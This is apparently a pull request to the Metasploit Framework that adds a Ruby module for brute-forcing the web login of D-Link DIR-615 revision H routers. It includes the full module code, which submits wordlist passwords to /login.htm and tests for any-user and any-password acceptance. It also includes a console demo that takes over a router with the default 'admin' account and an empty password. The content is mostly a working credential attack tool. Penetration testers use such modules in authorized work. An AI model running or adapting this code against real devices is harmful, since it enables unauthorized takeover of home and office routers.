### PR TITLE
Dlink DIR615 HW rev H login module

### DIFF
--- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
 				:sname => (ssl ? 'https' : 'http'),
 				:user   => user,
 				:pass   => pass,
-				:proof  => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
+				:proof  => "WEBAPP=\"Dlink Management Interface\", PROOF=#{response.to_s}",
 				:active => true
 			)
 

--- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
@@ -1,0 +1,149 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::AuthBrute
+
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'           => 'DLink DIR-615H HTTP Login Utility',
+			'Description' => %q{
+					This module attempts to authenticate to different DLink HTTP management services.
+					Tested devices: D-Link DIR-615 Hardware revision H.
+					It is possible that this module also works with other models.
+					},
+			'Author'         => [
+					'hdm',	#http_login module
+					'Michael Messner <devnull@s3cur1ty.de>'	#dlink login included
+				],
+			'References'     =>
+				[
+					[ 'CVE', '1999-0502'] # Weak password
+				],
+			'License'        => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptString.new('USERNAME',  [ false, "Username for authentication (default: admin)","admin" ]),
+				OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
+			], self.class)
+	end
+
+	def target_url
+		proto = "http"
+		if rport == 443 or ssl
+			proto = "https"
+		end
+		"#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
+	end
+
+	def run_host(ip)
+
+		@uri = "/login.htm"
+
+		print_status("Attempting to login to #{target_url}")
+
+		each_user_pass { |user, pass|
+			do_login(user, pass)
+		}
+	end
+
+	#default to user=admin without password (default on most dlink routers)
+	def do_login(user='admin', pass='')
+		vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
+
+		response  = do_http_login(user,pass)
+		result = determine_result(response)
+
+		if result == :success
+			print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
+
+			any_user = false
+			any_pass = false
+
+			vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
+			any_user  =  determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
+
+			vprint_status("#{target_url} - Trying username:'#{user}' with random password")
+			any_pass  = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
+
+			if any_user == :success
+				user = "anyuser"
+				print_status("#{target_url} - Any username with password '#{pass}' is allowed")
+			else
+				print_status("#{target_url} - Random usernames are not allowed.")
+			end
+
+			if any_pass == :success
+				pass = "anypass"
+				print_status("#{target_url} - Any password with username '#{user}' is allowed")
+			else
+				print_status("#{target_url} - Random passwords are not allowed.")
+			end
+
+			report_auth_info(
+				:host   => rhost,
+				:port   => rport,
+				:sname => (ssl ? 'https' : 'http'),
+				:user   => user,
+				:pass   => pass,
+				:proof  => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
+				:active => true
+			)
+
+			return :abort if ([any_user,any_pass].include? :success)
+			return :next_user
+		else
+			vprint_error("#{target_url} - Failed to login as '#{user}'")
+			return
+		end
+	end
+
+	def do_http_login(user,pass)
+		begin
+			response = send_request_cgi({
+				'uri' => @uri,
+				'method' => 'POST',
+				'vars_post' => {
+					"page" => "login",
+					"submitType" => "0",
+					"identifier" => "",
+					"sel_userid" => user,
+					"userid" => "",
+					"passwd" => pass,
+					"captchapwd" => ""
+				}
+			})
+			return response
+		rescue ::Rex::ConnectionError
+			vprint_error("#{target_url} - Failed to connect to the web server")
+			return nil
+		end
+	end
+
+	def determine_result(response)
+		return :abort unless response.kind_of? Rex::Proto::Http::Response
+		return :abort unless response.code
+		if response.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
+			return :success
+		end
+		return :fail
+	end
+
+end

--- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
 
-		print_status("#{target_url} - Attempting to login") 
+		print_status("#{target_url} - Attempting to login")
 
 		each_user_pass { |user, pass|
 			do_login(user, pass)
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def is_dlink?
-		#the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting 
+		#the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
 		#input to detect this device. Not sure if this works on other devices! Tested on v8.04.
 		begin
 			response = send_request_cgi({


### PR DESCRIPTION
lets brute one more dlink boxes ;)

DIR615 Hardware revision H:

Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615h_http_login) > run

[_] Attempting to login to http://192.168.178.233:80/login.htm
[_] 192.168.178.233:80 DLINK_DIR_615H_HTTP - [01/19] - /login.htm - Trying username:'admin' with password:''
[+] http://192.168.178.233:80/login.htm - Successful login 'admin' : ''
[_] 192.168.178.233:80 DLINK_DIR_615H_HTTP - [01/19] - /login.htm - Trying random username with password:''
[_] 192.168.178.233:80 DLINK_DIR_615H_HTTP - [01/19] - /login.htm - Trying username:'admin' with random password
[_] http://192.168.178.233:80/login.htm - Random usernames are not allowed.
[_] http://192.168.178.233:80/login.htm - Random passwords are not allowed.
[_] Scanned 1 of 1 hosts (100% complete)
[_] Auxiliary module execution completed
